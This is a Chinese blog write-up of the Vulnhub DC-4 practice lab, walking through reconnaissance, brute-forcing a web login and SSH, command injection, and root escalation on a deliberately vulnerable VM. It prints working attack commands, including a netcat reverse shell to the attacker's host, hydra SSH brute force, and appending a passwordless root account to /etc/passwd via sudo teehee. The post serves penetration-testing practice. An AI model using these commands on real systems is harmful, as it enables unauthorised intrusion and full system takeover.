Vulnhub靶场DC-4练习

已于 2024-07-04 12:29:09 修改
阅读量886 收藏 19
点赞数 23
分类专栏: 靶场 文章标签: 网络安全 web安全 linux vulnhub 提权
于 2024-06-25 18:07:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39762423/article/details/139965209
版权

目录

0x00 准备

下载链接:https://download.vulnhub.com/dc/DC-4.zip

介绍:
DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

重点:只有一个flag。




0x01 主机信息收集



kali本机IP:ifconfig ,网卡eth0,地址192.168.22.28 在这里插入图片描述





发现目标主机IP:netdiscover -i eth0 ,地址192.168.22.29。
在这里插入图片描述




探测目标主机开放端口:nmap -sS -sV -A -n 192.168.22.29,开放了22端口和80端口,其中80端口使用的nginx1.15.10。
在这里插入图片描述




0x02 站点信息收集




访问一下80端口:
在这里插入图片描述




看一下网站的目录结构:dirsearch -u 192.168.22.29 -e *
在这里插入图片描述




只有一个index.php,有其他的目录也全部重定向到这个页面中了。
index.php就只有一个登录框,其他有用的信息几乎没有。可以考虑爆破。
在这里插入图片描述




0x03 漏洞查找与利用

1. 爆破登录


输入username和password以后抓包,传输的明文的用户名和密码:
在这里插入图片描述


将抓到的包发送到Intruder(攻击)模块,Attack Type(攻击模式)先选择Sniper(狙击手)模式,盲猜username是admin,所以先只对password进行爆破:
在这里插入图片描述




payload set是对哪个字段进行爆破,前一步只设置了password一个字段。payload type选择Simple list简单字典即可。导入top1000的弱口令,点击start attack开始爆破:
在这里插入图片描述





对爆破的结果按照length进行排序,回显最长的这个是密码。
在这里插入图片描述




登录进来以后,看到下图左边的界面。点击command,到右边的界面。可以运行一些命令,点击run试一下,会回显运行的结果。考虑抓包进行命令执行。注意有个command.php文件。
在这里插入图片描述




2. 命令执行




选择一个命令,run一下,抓包。是通过radio这个参数提交run的命令的,并且命令的空格用+代替。
在这里插入图片描述





修改radio的值为cat command.php,看一下这个文件的内容。用的shell_exec(),直接考虑反弹shell。
在这里插入图片描述




3. 反弹shell


kali中安装netcat:sudo apt install netcat-traditional
kali中监听一个没有被占用的端口:nc -lvp 6666
在这里插入图片描述




在burpsuite中,执行:nc 192.168.22.28 6666 -e /bin/bash (kali的ip)
(将空格替换成+:nc+192.168.22.28+6666±e+/bin/bash)
在这里插入图片描述




forward上面的数据包以后,看到已经监听6666端口成功。
在这里插入图片描述




执行一下命令ls,可以看到成功。
在这里插入图片描述




执行命令:python -c "import pty;pty.spawn('/bin/bash')"
通过python的pty.spawn获得交互式shell。
在这里插入图片描述




4. hydra爆破ssh


去home目录下,找到jim用户,进入用户/home/jim/backups目录下面,有一个old-passwords.bak文件,文件内容是一些密码。并且目标机器开启了22端口,考虑是jim账户的密码。
在这里插入图片描述




把文件内容保存成a.txt。利用hydra对jim用户名进行爆破。
执行命令:hydra -l jim -P a.txt 192.168.22.29 ssh
在这里插入图片描述




ssh连接目标主机,用户名jim,密码jibril04。
命令:ssh jim@192.168.22.29
在这里插入图片描述




5. 提权


登录成功后提示有邮件。进入linux的邮件目录:cd /var/spool/mail/ ,查看jim文件内容,可以得到一个Charles用户给的密码。
在这里插入图片描述




切换到Charles用户:su Charles
查看当前用户的权限:sudo -l
在这里插入图片描述




考虑teehee提权。teehee命令可以往一个文件中追加内容,可以通过这个命令向/etc/passwd中追加一个超级用户,用户名为admin,没有密码,并且有root权限。
执行命令:echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
添加用户成功以后,切换到admin:su admin
进入root目录,可以看到flag.txt。
在这里插入图片描述

0x04 总结


主机信息收集:

  1. netdiscover探测目标主机ip。
  2. nmap探测开放端口和服务。

站点信息收集:

  1. dirsearch查看网站目录结构。
  2. 利用burpsuite的Intruder模块,弱口令爆破站点的登录密码。

漏洞利用:

  1. 命令执行,反弹shell。
  2. hydra爆破ssh。
  3. teehee提权。
RrEeSsEeTt
关注
  • 23
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub-DC-3靶场渗透练习
weixin_52451257的博客
11-17 2916
Vulnhub-DC-3 1105 DC-3 靶场地址: https://www.vulnhub.com/entry/dc-32,312/ 第一步:信息收集 nmap -sn 192.168.231.0/24 nmap -A -p- 192.168.231.141 dirb http://192.168.231.141 nikto -h http://192.168.231.141 去了日常四件套进行信息收集还可以通过joomscan工具对网站进行扫描 joomsc...
Vulnhub靶场练习 DC-1
m0_64227134的博客
04-23 509
Vulnhub 靶场练习 DC-1
Vulnhub靶场-DC-2靶机练习
qq_44877412的博客
01-20 399
Vulnhub-DC-2 daoyuan 零、环境配置 1、虚拟机:vmware 15.5.6 2、攻击环境:kali linux 2020.3 192.168.143.128 3、靶机:DC-2 靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。 一、信息收集 1、主机存活扫描 arp-scan -l 2、端口扫描 nmap -A -p- 192.168.143.135 发现开放的端口以及服务 80 wordpress 7744 ssh 3、脚本扫描 nmap --script
Vulnhub靶场DC-6练习
Reset
07-08 951
netdiscover探测目标主机ip。nmap探测开放端口和服务。dirsearch查看网站目录结构。wpscan扫描wordpress的用户。wpscan利用wordlists字典爆破密码。Activity monitor插件的漏洞:CVE-2018-15877反弹shell。nmap提权。
Vulnhub靶场DC-5练习
Reset
07-04 956
netdiscover探测目标主机ip。nmap探测开放端口和服务。dirsearch查看网站目录结构。利用burpsuite的Intruder模块,爆破文件包含的参数。利用文件包含,进行nginx日志挂马。反弹shell。screen4.5.0漏洞利用。
Vulnhub-DC-3靶场练习
qq_44877412的博客
01-20 923
Vulnhub-DC-3 daoyuan 零、环境配置 1、虚拟机:vmware 15.5.6 2、攻击环境:kali linux 2020.3 192.168.143.128 3、靶机:DC-3 靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。 可能会遇到如下报错: IDE设备(磁盘/CD-ROM)配置不正确。"ide0:1"上具有一个IDE从设备, 但没有主设备。此配置在虚拟机中无法正常运行。 请使用配置编辑器将磁盘/CD-ROM 从"ide0:1"移到"ide0:0”。 解决办法
Vulnhub靶场DC-2练习
Reset
04-10 462
netdiscover探测主机IP,nmap扫描开放端口服务。浏览器访问目标网站,找相关信息。cewl生成密码字典,wpscan扫描用户,再用wpscan指定用户字典密码字典进行爆破,得到两个用户。ssh连接,rbash绕过,用的环境变量。切换用户,git提权。
Vulnhub靶场DC-1练习
Reset
04-11 562
获得普通用户的shell,找数据库相关的信息,登录数据库,修改密码。数据库里的密码是加密的,先找到drupal的加密文件/var/www/scripts/password-hash.sh,这个脚本是php写的,还能用php加上参数来运行,直接得到加密后的密码。(这里的index.php可以是任意文件名,只要是能在前面指定的根目录 / 下能确定找到的文件就可以。有两种思路拿到这个用户的密码,一个是爆破,一个是提权打开shadow文件查看这个用户的密码。网站是drupal的内容管理框架,由PHP编写的。
靶场练习第十五天~vulnhub靶场dc-7
qq_57976347的博客
02-14 397
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-7.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.120 2.网站的信息收集 (1)靶机开放了80端口,先
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-1实战流程图
05-17
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8329
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
医疗器械网络安全 | 漏洞扫描、渗透测试没有发现问题,是否说明我的设备是安全的?
最新发布
网 安 云
07-10 483
尽管漏洞扫描、模糊测试和渗透测试在评估系统安全性方面是非常重要和有效的工具,但即使这些测试没有发现任何问题,也不能完全保证您的医疗器械是绝对安全的。网安云,目针对医疗器械海外国内注册、变更推出网络安全解决方案,专业安全专家与法规研究团队对国内、美国、欧盟等国家医疗器械注册网络安全要求进行深入钻研,为客户定制化网络安全方案,帮助客户为设备注册、上市出具符合法规要求的网络安全文件。综上所述,虽然漏洞扫描、模糊测试和渗透测试是评估医疗器械安全性的重要手段,但它们并不能完全保证系统的安全。医疗器械网络安全顾问。
【网络安全】实验七(ISA防火墙的规则设置)
Elena's Blog
07-07 1069
(1)将host1的IP地址设置为172.16.学号.学号(2)将host2的IP地址设置为172.16.学号.1学号(3)将防火墙的内网IP地址设置为172.16.学号.250,IP地址设置为192.168.17.1学号(4)在防火墙上配置路由功能,并使内、外网之间能互相PING通(1)(2)(3)(4)
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 1133
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
vulnhub靶场通关
09-09
vulnhub靶场是一个用于学习和测试网络安全技能的平台。通关vulnhub靶场需要进行一系列的渗透测试和漏洞利用操作。根据引用中提供的目录,以下是一个通关vulnhub靶场的大致步骤: 1. 环境搭建:下载靶场环境,并启动靶场环境。 2. 信息收集:通过探测靶机真实IP和开放的端口及服务进行信息收集。 3. 访问web站点:访问web站点并进行网站的扫描和漏洞探测。 4. 利用漏洞:使用Metasploit框架(MSF)进行漏洞利用。 - 使用MSF命令进行简单命令介绍和搜索Drupal 7的漏洞。 - 在MSF控制台中搜索drupal模块,并选择合适的模块进行测试。 - 设置靶机IP并运行相应的漏洞利用模块。 - 获取反弹shell或执行命令,并查找flag文件。 5. 登录站点:使用获取到的凭证登录站点并进一步探索和查找flag文件。 请注意,以上步骤仅提供了通关vulnhub靶场的大致思路,具体操作和漏洞利用可能因不同的靶场环境而有所不同。因此,确保在进行任何渗透测试操作之前,遵守法律和道德准则,并获得合法的授权。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值